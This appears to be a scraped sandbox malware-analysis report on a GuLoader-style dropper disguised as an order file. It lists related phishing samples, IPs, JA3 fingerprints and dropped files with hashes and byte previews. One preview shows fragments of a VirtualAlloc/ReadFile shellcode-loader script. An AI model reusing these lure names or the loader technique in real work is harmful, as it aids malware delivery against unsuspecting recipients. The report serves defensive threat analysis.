	https://pub-4d0a115db8fb4f15a6bf3059fadf5ec9.r2.dev/secure_response.html?user-agent=Mozilla/5.0WindowsNT10.0;Win64;x64AppleWebKit/537.36KHTML,likeGeckoChrome/86.0.4240.75Safari/537.36	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	ORDERDATASHEET#PO8738763.scr.exe	Get hash	malicious	AgentTesla, RedLine, SugarDump, XWorm	Browse	104.26.13.205
	DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Find-DscResource_QoS.ps1	Get hash	malicious	Unknown	Browse	104.26.12.205
	https://pub-4d0a115db8fb4f15a6bf3059fadf5ec9.r2.dev/secure_response.html?user-agent=Mozilla/5.0WindowsNT10.0;Win64;x64AppleWebKit/537.36KHTML,likeGeckoChrome/86.0.4240.75Safari/537.36	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DATACLUBLV	Order 000293884849900.bat.exe	Get hash	malicious	GuLoader	Browse	109.248.151.29
	rUniversidadedeBras#U00edlia-ProjetoFMD20240342.vbs	Get hash	malicious	Unknown	Browse	109.248.151.238
	17194198846f19431fa86ff695fe063dadb4561f59dac5dc011432c27d123f4314e8bbacda424.dat-decoded.exe	Get hash	malicious	AveMaria, PrivateLoader	Browse	109.248.151.231
	8x121Y7FNW.js	Get hash	malicious	AveMaria, PrivateLoader	Browse	109.248.151.231
	Product Specifications_pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	109.248.151.238
	RCBC Plaza Project Quotation.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	109.248.151.238
	ELMA _CO LLC_pdf.vbs	Get hash	malicious	FormBook, GuLoader	Browse	109.248.151.238
	UNIVERSITY OF SHARJAH- Project FMD20240342.vbs	Get hash	malicious	FormBook, GuLoader	Browse	109.248.151.238
	ELMA CO LLC Main File_pdf.vbs	Get hash	malicious	GuLoader	Browse	109.248.151.238
	ELMA CO LLC _pdf.vbs	Get hash	malicious	FormBook, GuLoader	Browse	109.248.151.238
CLOUDFLARENETUS	https://oceanofgames.com/	Get hash	malicious	Unknown	Browse	172.67.213.70
	http://johnlewisfr.vip	Get hash	malicious	Unknown	Browse	104.26.13.204
	Renameme@1.xls	Get hash	malicious	Unknown	Browse	104.21.18.65
	DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Potwierdzenie zam#U00f3wienia.doc.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	172.67.74.152
	INQUIRY#809676-JULY1.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.148.197
	https://0o2r8g.lotedes.com/iaxgkyg7/	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	Setup-10.msi	Get hash	malicious	Unknown	Browse	188.114.97.3
	NhWAWEhCi7.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	172.67.221.174
	http://johnlewisfr.com	Get hash	malicious	Unknown	Browse	104.26.13.204

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Maersk_Shipping_Invoice_Awb_Packinglist_pdf.vbs	Get hash	malicious	Unknown	Browse	172.67.74.152
	DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	DHL Shipping Document Awb & BL.vbs	Get hash	malicious	GuLoader	Browse	172.67.74.152
	Potwierdzenie zam#U00f3wienia.doc.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	172.67.74.152
	Setup-10.msi	Get hash	malicious	Unknown	Browse	172.67.74.152
	BQ & Drawings_pdf.r00.vbs	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://bpecuniaimmobili.com/J0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MzY/	Get hash	malicious	Unknown	Browse	172.67.74.152
	Kh7W85ONS7.exe	Get hash	malicious	AsyncRAT, DarkTortilla, StormKitty, WorldWind Stealer	Browse	172.67.74.152
	Purchase Order Project No.8873_ECOFIX.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	Purchase Order Project No.8873_ECOFIX.exe	Get hash	malicious	Unknown	Browse	172.67.74.152

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll	004552024107.bat.exe	Get hash	malicious	GuLoader	Browse
	DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe	Get hash	malicious	GuLoader	Browse
	004552024107.bat.exe	Get hash	malicious	GuLoader	Browse
	P0-ADFUK.bat.exe	Get hash	malicious	GuLoader	Browse
	P0-ADFUK.bat.exe	Get hash	malicious	GuLoader	Browse
	pp0fHVNbib.exe	Get hash	malicious	FormBook, GuLoader	Browse
	pp0fHVNbib.exe	Get hash	malicious	GuLoader	Browse
	kZlAkx6fp7.exe	Get hash	malicious	FormBook, GuLoader	Browse
	kZlAkx6fp7.exe	Get hash	malicious	GuLoader	Browse
C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\BgImage.dll	004552024107.bat.exe	Get hash	malicious	GuLoader	Browse
	DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe	Get hash	malicious	GuLoader	Browse
	004552024107.bat.exe	Get hash	malicious	GuLoader	Browse
	P0-ADFUK.bat.exe	Get hash	malicious	GuLoader	Browse
	P0-ADFUK.bat.exe	Get hash	malicious	GuLoader	Browse
C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\UserInfo.dll	004552024107.bat.exe	Get hash	malicious	GuLoader	Browse
	DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe	Get hash	malicious	GuLoader	Browse
	004552024107.bat.exe	Get hash	malicious	GuLoader	Browse
	P0-ADFUK.bat.exe	Get hash	malicious	GuLoader	Browse
	P0-ADFUK.bat.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\App.ini

Download File

Process:	C:\Users\user\Desktop\Order 00293884800595.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	49
Entropy (8bit):	4.75216571132969
Encrypted:	false
SSDEEP:	3:a6QLQIfLBJXlFGfv:xQkIPeH
MD5:	797DA95245047A54F125FBF3B19FA295
SHA1:	9E46F51C033836343C4099609F35B9B62C290A00
SHA-256:	A047914D1DB23829E36D3A2A908D83F4B51F5A8194AE090BB9F9AB9F8DDA9128
SHA-512:	4755C72A469C7C816D7B4A08BFEABFC266AAD029156A301E2592E3AFD16C5DB5FCE44C4475CB83C43B859A06AD069370182FCA5CAFACF4A27D191F4C0AE34A03
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[Loading]..Start=user32::EnumWindows(i r2 ,i 0)..

C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\BgImage.dll

Download File

Process:	C:\Users\user\Desktop\Order 00293884800595.bat.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7680
Entropy (8bit):	5.188410641489526
Encrypted:	false
SSDEEP:	96:8eQMA6z4f7TI20Y1wircawlkX1b3+LDfbAJ8uLzqkLnLiEQjJ3KxkP:tChfHv08wocw3+e8uLmyLpmP
MD5:	2D5F40DDC34E9DC8F43B5BF1F61301E3
SHA1:	5ED3CD47AFFC4D55750E738581FCE2B40158C825
SHA-256:	785944E57E8E4971F46F84A07D82DEE2AB4E14A68543D83BFE7BE7D5CDA83143
SHA-512:	605CEBCC480CB71BA8241782D89E030A5C01E1359ACCBDE174CB6BDAF249167347ECB06E3781CB9B1CC4B465CEF95F1663F0D9766ED84EBADE87AA3970765B3E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: 004552024107.bat.exe, Detection: malicious, Browse Filename: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, Detection: malicious, Browse Filename: 004552024107.bat.exe, Detection: malicious, Browse Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4.W.p.9Cp.9Cp.9Cp.8C@.9C..dCy.9C$..Cq.9C$..Cq.9C..=Cq.9CRichp.9C........PE..L....C.f...........!......................... ...............................P............@..........................$....... ..d............................@....................................................... ...............................text...3........................... ..`.rdata....... ......................@..@.data...$....0......................@....reloc..l....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\Order 00293884800595.bat.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.744994954995265
Encrypted:	false
SSDEEP:	192:gFiQJ77pJp17C8F1A5xjGNxrgFOgb7lrT/nC93:E7pJp48F2exrg5F/C
MD5:	12B140583E3273EE1F65016BECEA58C4
SHA1:	92DF24D11797FEFD2E1F8D29BE9DFD67C56C1ADA
SHA-256:	014F1DFEB842CF7265A3644BC6903C592ABE9049BFC7396829172D3D72C4D042
SHA-512:	49FFDFA1941361430B6ACB3555FD3AA05E4120F28CBDF7CEAA2AF5937D0B8CCCD84471CF63F06F97CF203B4AA20F226BDAD082E9421B8E6B62AB6E1E9FC1E68A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Joe Sandbox View:	Filename: 004552024107.bat.exe, Detection: malicious, Browse Filename: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, Detection: malicious, Browse Filename: 004552024107.bat.exe, Detection: malicious, Browse Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse Filename: pp0fHVNbib.exe, Detection: malicious, Browse Filename: pp0fHVNbib.exe, Detection: malicious, Browse Filename: kZlAkx6fp7.exe, Detection: malicious, Browse Filename: kZlAkx6fp7.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir.-.D.-.D.-.D...J..D.-.E.>.D......D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L....C.f...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...h....P.....................@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\UserInfo.dll

Download File

Process:	C:\Users\user\Desktop\Order 00293884800595.bat.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.327532764383977
Encrypted:	false
SSDEEP:	48:qKNKyd+Z46pHT1wHsl9rEGbgPgVZShMmj3OPRYBA:5JSRzuHsxE4VH6O+i
MD5:	90228DD140188EC0CA02F7F52E4C9A30
SHA1:	6880D9AEEC4C97C4B7718044C9C59B92379FEACA
SHA-256:	54BCF3D018734B884BD33A74A05EEA0AC3C83501ACBDB71EA8EC56EC9402A263
SHA-512:	1A38B1EBB9E2440DD240C8CD2406261E21B544ED392F808D36F78590075F854D89E624589BFDDABCACE96B33A7F3084C7686351BD66AE07EC035BBEF94EF8DA2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: 004552024107.bat.exe, Detection: malicious, Browse Filename: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, Detection: malicious, Browse Filename: 004552024107.bat.exe, Detection: malicious, Browse Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L....C.f...........!................\|........ ...............................P............@.........................@"......l ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...X....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\Order 00293884800595.bat.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6656
Entropy (8bit):	5.178709395875687
Encrypted:	false
SSDEEP:	96:z0OBtYZKtPsrqBApt1JHpb9XWk7Qe06iE6mE6YNFyVOHd0+uPHwEX:4tZKtrAJJJbP7iEHEbN8Ved0Ph
MD5:	4A2F4FE4A3AD1DE56EE6BF7DD4923963
SHA1:	7CC68B94448C964FD99904E5784B059AED4D5DAA
SHA-256:	89B1E6509A1B45B32933E9D785A9C8C5B9CE7C616E1112DCF7FC3FA5CA27EBDE
SHA-512:	4B6BBE75BEAFAE9A29932FF5DDD3940AADFAE62C157836E6CDAB755955782DD5354D5EB389B4B8C16BF59F4CE7A099A0161D915C1CF2968F28E195DC8E3997EA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmc.ini

Download File

Process:	C:\Users\user\Desktop\Order 00293884800595.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.163856189774724
Encrypted:	false
SSDEEP:	3:+gMn:8
MD5:	ECB33F100E1FCA0EB01B36757EF3CAC8
SHA1:	61DC848DD725DB72746E332D040A032C726C9816
SHA-256:	8734652A2A9E57B56D6CBD22FA9F305FC4691510606BCD2DFCA248D1BF9E79C7
SHA-512:	D56951AC8D3EB88020E79F4581CB9282CA40FAA8ADC4D2F5B8864779E28E5229F5DFE13096CF4B373BBC9BC2AC4BFC58955D9420136FB13537F11C137D633C18
Malicious:	false
Preview:	[Caps]..Setting=Enabled..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Allopurinol.flu

Download File

Process:	C:\Users\user\Desktop\Order 00293884800595.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	3011
Entropy (8bit):	4.875614577841428
Encrypted:	false
SSDEEP:	48:Sl+lWlUMDNbr6641SO9Agz4x2qEtyTgz0gWP5CZ9sam0uxKKhY7SDEf:W+lLMDNbr6641S0z4xFEITggV+9zXa3Q
MD5:	6103DF2AF52F53D95AF61664D1866FFE
SHA1:	6AD99D4586667B497725EEC01AE0A772C441C1D4
SHA-256:	6AA446B014371D8DD9EF43D2A103E9CA8A0F61A3AFC4676BFC63AD07C1977C7E
SHA-512:	2AFA117DD3ACB8B695FFBC0F236E8B87F1DD4A7EAFD79A26CB4F191EED76DEBA7CBB106F3E78218769581C014840D039A4E173340CA0D6C2D2DFF0B5C5138096
Malicious:	false
Preview:	...W..n......t......b.5..Cb....&.................:....Q........x.i..../........h....x.`......(...D..x`...........'...M..z..v.........J.;...3...B.......#..s.._......p....q.,.t..........J.............................5...W.;B...G......._.............G.".3...mi..9.=..4.......V........7......@..o.1..n...u......9............=........D...........=.........y..).............Q.q................zG....O.0.}C...@......8.9bg.M...<........r......!Y.J.......A..........;.R............3..\...4.....N.2.X.i.......'.s..0....7....<...6.<......~..........).>..]...;....I...........:...R.....Lg....v..8............m.................T.$......ry5.5......A............M.............p..k..........2...~.k......................Y.Y`...}.....f.......8.PE........m...:.......a~......l-8..P..z..%.0.....]..L:.....E....?9.1.......;...E.....\|...t.....n................vH.....u.................Q.<.Y....8......r.v............7........,1....Z.....c..6.G.....xc..j...8.H~....#.........F.,.......{-.VQ..6.v..u..f.....$.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Charting.skr

Download File

Process:	C:\Users\user\Desktop\Order 00293884800595.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	3794
Entropy (8bit):	4.876163305802233
Encrypted:	false
SSDEEP:	96:LnmpgKl8MI0hs4Qnu6lgB+EQFO+trNMgUIkR:7UpaMI34iu6eBdwO+8rIkR
MD5:	0629DF955F60990975A3C8EF199B57E9
SHA1:	FE57FA7FDF44B6E789A760C5292FD8DAE221187B
SHA-256:	499908BD96C7F2D9BC0F94433CC14C482C002C07A09DF0D73AF45BC17C4DA70B
SHA-512:	753EB2360926F32A6ED70E034FEAA57D6274756C3CE60914A4A1EC12DC07ACAC92C7906E3FE48A76F74BBEFBE8EAC023D352D11A087F47DEE9BD0ACBB59331F8
Malicious:	false
Preview:	.s............W?...T.7.h....~..2....4....`...Z....n..,.....L#.<....`j......U.................l...n.....................j......_...!/...........A........-.......Tk.................W......wv.4.N.....................>....n.T....OP.....%..e..."....,...]U...R. ..4.1k..........3J.%......d.....W............~..z...`........p......~D.....o..[...ib.......C......A..........%.....{.......W.r...............f...h....<...........~.......9.#.......0B>..o..*............,....p........T....J...]Y.S .........#.............................z......3..........{....H....p......v......V..F......,U..=.......R......Q.._.-4........,1...0.............v...z.............2<g.......;....!........g..d.1......d.J-......E.q......,.+...>.4eh...\|T.:....B.......C........U......?.>..7.....h.....:...."..!..........6..........................B.@D.W.....8..............t..H.h............................S...h.....x....5......c."...................Q>.....2.5...)....%......T.....v........;1.......x.'.D.....y=.......O........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Incute.Reb

Download File

Process:	C:\Users\user\Desktop\Order 00293884800595.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	10873
Entropy (8bit):	4.45315643418991
Encrypted:	false
SSDEEP:	192:NnMiU6OB3y5rHQbiFwEfer0QRluQmbOysQvb7QdhA4rkcm+W86T:NMiU6U3y5jE6w0erLR0FOWbUDAUg
MD5:	4E2651680D03081750960F589C34FAFA
SHA1:	F2C11C99549A2F32D2F794271CFF605470A0DDA3
SHA-256:	47C3443F81BD967BBC234AC79B0B240EBDFCEF0684890AF05E30CD4B41818087
SHA-512:	6F0DACB3704F2AC5357BF228AF41D55D270C75CDF0359C50BBE10E61E80EE24AD2D4EB2E25B00DCBC75CD1F769E33F81236B9BBF338C495F787A225C115C991E
Malicious:	false
Preview:	...A...........8.LLL.4.mmm...II.............KK.......LL............`.\\\...................._k...e...r..^n.gge...l...3...2...:...:...C...r...e...a..ot...e...F...i...l..ce...A...(...m.yy ...r...4.P. ...,... ...i... ...0...x..=8...0...0...0...0...0...0...0...,... ._.i... ...0...,... ...p... ..G0...,..I ..8i... ...4...,... ...i... ...0...x...8...0...,... ...i... ...0...)...i.......r...8..2q...k...e...r...n...e...l...3...2...:...:...S.:.e...t...F..Hi...l...e..fP...o.i...n...t...e...r...(..Si.rr ...r...8...,..{ ...i..& ...2...3...0...1...2... ...,... ...i... ...0...,...i... ...0...)...i.......r...4...q...k...e...r...n...e...l...3...2.3.:...:...V...i...r.HHt...u...a.Z.l...A...l...l...o..ac...(...i... ...0...,...i... ...3...1...6..)7...4..~3...6.!!8...,..G ...i..\ ...0..dx...3.Y.0...0...0..v,... ...i.;; ...0...x..'4...0...)...p.......r...2...q...k...e...r...n.{.e...l...3...2...:...:...R...e...a...d...F...i...l...e...(...i... ...r. 8..1,... ..Zi.x. .6.r..Q2...,... ...i. . .ff3...1...6.j.7

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Ragworm.Loy

Download File

Process:	C:\Users\user\Desktop\Order 00293884800595.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	253454
Entropy (8bit):	7.522001887072237
Encrypted:	false
SSDEEP:	6144:4p6mcA5t6dww234eadgurEHsERrPNEVzoo3mKd/nmt+:06mR5Edt22uv1emKB9
MD5:	30D029AAEF1DD0E2E041462E6AE62742
SHA1:	E8065BC7AEE55C97FA97A08070F40F2BF5169464
SHA-256:	43F89369DB3D8E15A092E771580E111E4CD3C517F83F48CAC9907FBF9872B2A0
SHA-512:	724DD6EA2CBB319ADFA7A2AC4E87739AF15A3C4D1904743032AC0CF2D1E4AE6240B81FD65E041AF34F8233393A7BAA1D8EE907FB311F741F7BB9A6B86AC1F824
Malicious:	false
Preview:	...............WWW.???..............------...................H......................ccc..b....vvvvv.X.........................................................ZZZ.@@......6..PPP.)))...888........GGGGG........................EEEE....L...............c..........o.............N...........MM.................................$$..r...................@.......^.#..........C......ccccc.........ddd......................A......................................!....G......????...................LL..........^.......................QQQQQQQQ....z..............1....."""................bbb...^.A....................q.....................................s.........<<.N.....................KKK...................................ggg....]._....777.c................]......x............;......2222..a.x....;;.I....\|...nnn....::.f..666.................X.........QQQ........v...........3..........{..........................*....N..........}.................###..................;;;;.............X.....QQ.......i....HHH.j

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne\materialiter.sig

Download File

Process:	C:\Users\user\Desktop\Order 00293884800595.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	2438
Entropy (8bit):	4.834166284053989
Encrypted:	false
SSDEEP:	48:QMQ2WErZ2pGC24S3HorZ9JAGA8jkcrbs1DHkkkIq/iSlcHKMVi:X59ys3HorNAGArcr2c/WKWi
MD5:	6C88CA43B6FA2E51F1BE781CDF1A7C3E
SHA1:	85E53052FFFD4D9AB7FD255A39628FB9D9A4C57D
SHA-256:	87747776DBB97E3892F3B4FE2507A907737E3E01F94F88B0D0ED7D849EFD31CF
SHA-512:	4B12F969637C61A8F6E1EF79DB3D54DC076672E35B1F67B9742F3B99A38F933298E2DB262A5DB487E281B85BF37FF74FB036E5C5AA3D6844B2D8AC0937B0F483
Malicious:	false
Preview:	...-....?..A..d.Z..............!.........\..j+.\...E.C..0.6........3.......K....E.....x....g..l.A............Ic........)P.7e.?.......v...\|...Q.....h..<.....>........v6.=..;....@...............8,.........W....4.w... ..y......n._...L.IFr.....N...w...U..........H...%.......)......n..<K...:.........o...x..<........0....I...!&.......<.....p..._...........s.......L.......O...F...........p.......c..c.........%.]........X.........-......X.....{.x........^."...x...N....,..........1......)WD.+.[........?P..........4....6...........Z.B............R....;.....e.(.....7...}.........P....3...7B.....(...................................$........O.-"...k....]..........]....F.)...........)......v.....^..Q.......f}......!....0.........=........................m...........A....Q...(w...a......J3...U.n....\0...M..)......Y.....P..#...........p..R........N..^...R.............'.{.............y....g.....^L.......X.............t=z...VP..\|.........l..E.-..(..F.....q..I....p..N\.......S.....f1.......4.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne\preinvest.pri

Download File

Process:	C:\Users\user\Desktop\Order 00293884800595.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	3194
Entropy (8bit):	4.87998401204962
Encrypted:	false
SSDEEP:	48:rpEyDeY5QtYx201GaEtVnQvy5Dv6Z3JIV50tFh1FrDopL0AHmEMAaovQIS+GO/m+:fDeATGaETkd5J8e51xMYOey/mgRbP
MD5:	73DC0D944FBB5219CEDD966AF6EBB2C8
SHA1:	24D17D23C94CFC76FEF577CAF82C6D45B6125591
SHA-256:	3C2F20CCCBB8EEC2F5B2A70E44EC1631BFC8070C2F5A9198F1096563A8D0FA52
SHA-512:	72FE2BEEAFE7F5296FA346947E0BE3824B934545A299BFCB4AEBA9BD095AA7A2756E42C9D88E5DDDD072C931D35075AED7C7D4E3B641F74A62C96E150C573E4F
Malicious:	false
Preview:	........F...........].....<.~......d.............Y..1t...o...(...XA...~.h.qE-...KY..........F{....X............E)....x...R}......$$.}..6.......h+...9&.....c.....+.f..d........!.C....E.z../.....MZ............g.......\..?....@.....s..k.P}......$.<...........aE....!q...........e.V.q.b..Ui.R..>.h..R.F...........jM.W..G...^.l.....%.........D.......v.P.=....s<.....D".....0.).$...B......+..*.B......N..o....o../....z..................G..............%..L..Y.....r.B.Zn..I...x...f.............)....6........?..............."..............'....-......G.................x..C...............t....`.................Q.a....}....e...................i.............0.q.....G..#......t....../]..hH.(......C.Y.z4...y........T..E...E....3....i....._........>.?.p...e....y..)?...o..i....5...S.$.....,.............\.......)..u.........8............p..\......... .........3...9....t...._..o......#U...r0..................g..............n.....d.....b....qE...............4..%..j..0Y.P......(.z...........R<C....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne\ridningen.txt

Download File

Process:	C:\Users\user\Desktop\Order 00293884800595.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	434
Entropy (8bit):	4.287029634434794
Encrypted:	false
SSDEEP:	12:THnAEO/X/lz5Qxq70QPiETlsieWr5hmhAZYOua3Jy6:kt5CqtPT7rUk3f
MD5:	D831A4A6C7B8B672C51DC73C42BF1B99
SHA1:	2EFA4039C5CBBE38D45B65CFCD8CB283B0B00F6F
SHA-256:	57B3854CDF7B15EB58BFD24E92F41E8B4A513F9A413E7981891B71F5BD56F4B8
SHA-512:	D5920BC02B61C18C83CE48D41AE1777F50685766A60CCB6C53161B25E3AFB34A1DDB0E8710C37E3B8B050F772E3EAB3A65FB4ACB093AEFD55AA2FDA74EC6C8F7
Malicious:	false
Preview:	chertier urduet extrabronchial foruroliger weakliest digesters glansbillederne weretiger superinfiniteness halisteretic udkommentere snowbourn gldstninger..resknderens landhandler ujvnheds rankerne rykkedes,kosos skabelseshistoriens sklves newsmagazine,timberman civilists expection unlowered agrostology landsplanlgnings stereoisomerism.parablen pachydermatoid jumpsuits kraftens estraden.misocapnic blygraa perirraniai flaskebakker,

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\lvens.flb

Download File

Process:	C:\Users\user\Desktop\Order 00293884800595.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	2322
Entropy (8bit):	4.685927571910316
Encrypted:	false
SSDEEP:	48:hKk/USLt/YV/KNG2/Jddel368ugS8jMMccq3mtjzlrNiNviupW9:hb/USL1YV/K/TdeQ8jMMcYn3Opq
MD5:	C4A322BD2B1B0FD5130E2119EBE14A09
SHA1:	4C0F0F8AAC954E9D599F8C89B340F5C3C4742A6B
SHA-256:	063D6E2970210F7A4C74FE744AD76E71650AB5CB974EE4A9AF2BF446D6B2B3BF
SHA-512:	64FCE5DC8E510DCCAEA30E2BDB0671C706CECFB4AEC19ECD5B6326E4EE4B1B33A422E917A522F0CFCA184007ABE2B9D89EA401757A637D8D3DFA4B156E58A04A
Malicious:	false
Preview:	..e..k......Dh........=........z...W...m5K...0...R....4:.L....p.........-.......>...`..#.^.......>...d.d..7..........E...5N...@.......................K......:.o........t....... ......;....e.....R............>......,..&.\|...................l+..e....q..Cf....U\|..I.X.....U..e.G.....f.........&.......A....................9..}....E...............~.....9...q......T...G.....( ..t..x.......y......[.........Hh....GC9...........Q......C..N..Qt.~.......x.....L.......1.............................T..........V....6.....Ajt..@.....?...............$X.......m.n..........,.U......7.......X.................V........W......\P..............PE.....w......F....:.'9H....;eB.....{+.{.J....s........F....:......X..k.........../.......?.Z..+.....>.F..`1T....2.3.I7...`..{....k.u......b.......J+D...........Y8..y......UU...............3./...... .....[........]N6...y.e.........H..............m...........\.........V..[........W...&.U..........2..r....C....U.3....?...~....Wz......W.....\|.C.......a,............

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\chokoladeforretning.mar

Download File

Process:	C:\Users\user\Desktop\Order 00293884800595.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	3861
Entropy (8bit):	4.8950653795254695
Encrypted:	false
SSDEEP:	96:GKEfl8Ry/OyCvfcyh5ph9whBJQRaTYbEVr1wbd:MfObXc2h9iQUDZ1y
MD5:	2B5A33F2637CE6016495BE603413514E
SHA1:	571279989D47FF42C2974CDEDEA4C872CB9424CF
SHA-256:	46F41A0D8B9B891702F9ED2FB60FF737A2275011882501155B710EF9BA8577C7
SHA-512:	F55FE759C0DF2E8B9E38962E386BEB468FD4442714233F5A5DD13CA10647411FD62D966D8363FE50568F15525EEE815493AEDEF112A6FA6FA0B506A97AF21CF6
Malicious:	false
Preview:	.N..........b..Q...G..p.1...;...f._......X.........+..................1r.ES...9...~..C...?B...........IpF........0.......3...............S.......w..>?...$.....J...q..............K..................l........................;.......!.....................I.:..................S......4..kZ.../..................d.......a..............cs....9.......l......(....h.....F..'.V..........}..&C.;U..........._...............N..#.V...................:..".............j...?.....K...H.....s................._....L...1.....Z..L........."..........J.......1......`.......1..........@.y.......6...P...]....Z..........................Ob.....L.....U..cZ..n.CXq.........0...q.......K..........U...K....@/..\|.......... ..\|......pN.E......................>......?..Z=k....<............S......p.<..3..........1o.......Il.....3.y.................2....(.!.i(XC...b...Le..`.........@....................=.....=v.=.'..>.............?........].Y..m........."$^L..^A...u......O....K9.3.......................;uG...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\doubling.reg

Download File

Process:	C:\Users\user\Desktop\Order 00293884800595.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	3435
Entropy (8bit):	4.910328234136937
Encrypted:	false
SSDEEP:	48:P/sA7KBdAWdry+HEnrwU7j9mS/QwZ/kQMlzuVm+aAIBzx396upw/QAa/rl0:sA70/BEwy9D/XDVtIBzx3oupIa/6
MD5:	4A27BE5B33E9690FFCC4087DE6B78DE1
